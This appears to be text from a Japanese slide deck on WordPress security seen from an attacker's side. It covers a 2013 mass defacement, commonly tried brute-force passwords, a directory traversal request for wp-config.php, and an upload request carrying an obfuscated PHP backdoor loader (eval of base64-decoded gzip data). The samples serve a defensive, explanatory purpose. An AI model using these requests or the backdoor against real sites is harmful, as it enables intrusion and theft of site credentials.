More Related Content
More from yoshinori matsumoto (12)
攻撃者からみたWordPressセキュリティ
- 4. 現状
• 2013年9月 ロリポップの WordPress が一斉に改
ざんされる
• 約8,000件のサイトが
被害に
• サイト名が
「Hacked by Krad Xin」
等に改ざん
- 13. こういうふうに攻撃してくるゾ
試行パスワード 回数
[server-name]123456 96
[server-name]123 49
[server-name][server-name] 48
[server-name]000000 48
[server-name]111 48
[server-name]111111 48
[server-name]1234 48
[server-name]12345 48
[server-name]12345678 48
[server-name]123abc 48
[server-name]222 48
[server-name]222222 48
[server-name]333 48
[server-name]444 48
[server-name]555 48
[server-name]555555 48
[server-name]666 48
[server-name]666666 48
※ 2014年3月~5月計測
傾向は期間によって若干異なります
- 14. こういうふうに攻撃してくるゾ
POST /wp-content/themes/(THEME)/dl-skin.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux amd64) AppleWebKit/534.36 (KHTML, like Gecko)
Chrome/13.0.766.0 Safari/534.36
Host: server
Accept-Encoding: gzip
Referer: http://server/wp-content/themes/ (THEME) /dl-skin.php
Accept-Charset: utf-8,windows-1251;q=0.7,*;q=0.6
Accept-Language: en-us,en;q=0.8
Keep-Alive: 300
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.4
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
( PARAM )=..%2F..%2F..%2F..%2F..%2Fwp-config.php
ディレクトリトラバーサルの脆弱性を使用して
wp-config.php の内容を読み取ろうとしている
- 15. こういうふうに攻撃してくるゾ
Content-Disposition: form-data; name="Filedata"; filename="ifire.php"
Content-Type: text/plain
<?php
eval(gzinflate(base64_decode("DZZHDqwIEkTv0qv/xQIovEa9wHtXeDYtvPee009dIJX5FBk
RxZn0f6q3Gcs+2Ys/abIVOPpfXmRTXvz5R4hjYd08eetcBFr0pQjoAYzFmIynUXP1twBDkLIVp
9ku+c7Gx5lyEF*******sO0rvRimq14L4AP4oNUm42E/uiMCbyyu1txOSxZtXwSNTvMO1d
1JuzCHsVdjwr534ek0DFSSeQXkmNVMhLNMB1rr79KCJIAAIIgUYKX/u8/f//+/d//AQ==")));
?>
既知のファイルアップロード機能に認証がない脆弱性を使用して
PHPファイルをアップロードしようとしている
アップロードされたファイルは
バックドア(攻撃者専用の裏口)として動作する